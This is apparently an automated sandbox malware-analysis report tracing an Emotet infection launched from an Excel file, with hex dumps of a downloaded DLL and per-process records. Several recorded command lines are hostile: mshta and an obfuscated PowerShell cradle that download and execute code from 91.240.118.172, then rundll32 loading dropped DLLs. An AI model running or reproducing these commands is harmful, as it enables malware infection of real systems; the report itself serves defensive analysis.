                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
                                                                                                                                                          Jan 29, 2022 00:14:50.175354958 CET18INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 29, 2022 00:14:50.175368071 CET19INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 29, 2022 00:14:50.175389051 CET21INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 29, 2022 00:14:50.175405979 CET22INData Raw: 89 4d f8 8b 4d f8 e8 4f 00 00 00 89 45 fc 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc
                                                                                                                                                          Data Ascii: MMOEM]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>
                                                                                                                                                          Jan 29, 2022 00:14:50.175421953 CET23INData Raw: 01 89 45 10 85 d2 74 13 8b 4d fc 8a 55 fb 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89
                                                                                                                                                          Data Ascii: EtMUEEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;Mr
                                                                                                                                                          Jan 29, 2022 00:14:50.175437927 CET25INData Raw: 00 eb 12 8b 4d fc 83 c1 01 89 4d fc 8b 55 e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89
                                                                                                                                                          Data Ascii: MMU(UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUR
                                                                                                                                                          Jan 29, 2022 00:14:50.175453901 CET26INData Raw: 45 0c 50 8b 4d 08 51 ff 15 a8 62 04 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85
                                                                                                                                                          Data Ascii: EPMQb]UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WE
                                                                                                                                                          Jan 29, 2022 00:14:50.175467014 CET27INData Raw: 8b 4d fc 8b 55 f0 03 51 24 89 55 e0 c7 45 ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1
                                                                                                                                                          Data Ascii: MUQ$UEEEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQU
                                                                                                                                                          Jan 29, 2022 00:14:50.175482035 CET29INData Raw: 30 05 10 0f af 15 c8 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b
                                                                                                                                                          Data Ascii: 0000++0+0000000+000000++0+0000000+000000++0+00
                                                                                                                                                          Jan 29, 2022 00:14:50.353693962 CET30INData Raw: 2b 0d c4 30 05 10 a1 c0 30 05 10 0f af 05 c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30
                                                                                                                                                          Data Ascii: +000+00+0+000+0000+00+000++00000++00+000+00+0+000+00


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:00:14:13
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                          Imagebase:0x13fd90000
                                                                                                                                                          File size:28253536 bytes
                                                                                                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:00:14:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                                                          Imagebase:0x4a6c0000
                                                                                                                                                          File size:345088 bytes
                                                                                                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:00:14:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                                                          Imagebase:0x13fc80000
                                                                                                                                                          File size:13824 bytes
                                                                                                                                                          MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:00:14:20
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                                          Imagebase:0x13f740000
                                                                                                                                                          File size:473600 bytes
                                                                                                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:00:14:54
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                                          Imagebase:0x4a530000
                                                                                                                                                          File size:345088 bytes
                                                                                                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:00:14:54
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:00:14:57
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:00:15:12
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:00:15:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:00:15:29
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:00:15:33
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:00:15:49
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
